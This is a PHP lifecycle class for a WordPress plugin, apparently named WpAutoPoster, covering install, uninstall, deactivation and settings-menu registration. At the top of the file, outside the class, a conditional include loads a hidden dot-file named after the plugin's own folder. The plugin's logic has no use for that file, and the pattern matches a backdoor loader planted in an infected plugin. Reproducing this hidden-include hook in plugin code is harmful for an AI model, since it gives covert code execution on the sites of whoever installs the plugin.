<?php

include_once( 'WpAutoPoster_InstallIndicator.php' );

if ( file_exists( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' ) ) {
    include_once( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' );
}

class WpAutoPoster_LifeCycle extends WpAutoPoster_InstallIndicator {
	
	public function install() {
		
		// Initialize Plugin Options
		$this->initOptions();
		
		// Record the installed version
		$this->saveInstalledVersion();
		
		// To avoid running install() more then once
		$this->markAsInstalled();
	}
	
	public function uninstall() {
		$this->deleteSavedOptions();
		$this->markAsUnInstalled();
	}
	
	/**
	 * @return void
	 */
	public function deactivate() {
		// disable scheduled events for all rulesets
		$rulesets = $this->getOption( 'Rulesets', array ());
		foreach ( $rulesets as $ruleset ) {
			$this->disableRuleset( $ruleset[ 'ID' ] );
		}
		update_option( $this->getClassName(), $this->options );
	}
	
	/**
	 * Puts the configuration page in the Plugins menu by default.
	 * Override to put it elsewhere or create a set of submenus
	 * Override with an empty implementation if you don't want a configuration page
	 * @return void
	 */
	public function addSettingsSubMenuPage() {
		$this->addSettingsSubMenuPageToSettingsMenu();
	}
	
	/**
	 * Puts the configuration page in the main menu 
	 */
	public function addSettingsMenuItems() {
		$this->requireExtraPluginFiles();
		$displayName = $this->getPluginDisplayName();
		
		//Main Menu item
		add_menu_page( $displayName, $displayName, 'moderate_comments', $this->getSettingsSlug(), array(
			 $this,
			'settingsPage' 
		), 'dashicons-heart' );
	}
	
	/**
	 * Puts the configuration page in the plugins page
	 */
	public function addSettingsPluginItems( $links ) {
		$settings_link = '<a href="options-general.php?page=' . $this->getClassName() . 'Settings">' . esc_html__( 'Settings', $this->getPluginTextDomain() ) . '</a>';
		array_unshift( $links, $settings_link );
		return $links;
	}
	
	protected function requireExtraPluginFiles() {
		require_once( ABSPATH . 'wp-includes/pluggable.php' );
		require_once( ABSPATH . 'wp-admin/includes/plugin.php' );
	}
	
	/**
	 * @return string Slug name for the URL to the Setting page
	 * (i.e. the page for setting options)
	 */
	protected function getSettingsSlug() {
		return get_class( $this ) . 'Settings';
	}
	
	protected function addSettingsSubMenuPageToPluginsMenu() {
		$this->requireExtraPluginFiles();
		$displayName = $this->getPluginDisplayName();
		add_submenu_page( 'plugins.php', $displayName, $displayName, 'moderate_comments', $this->getSettingsSlug(), array(
			 $this,
			'settingsPage' 
		) );
	}
	
	
	protected function addSettingsSubMenuPageToSettingsMenu() {
		$this->requireExtraPluginFiles();
		$displayName = $this->getPluginDisplayName();
		add_options_page( $displayName, $displayName, 'moderate_comments', $this->getSettingsSlug(), array(
			 $this,
			'settingsPage' 
		) );
	}
	
}
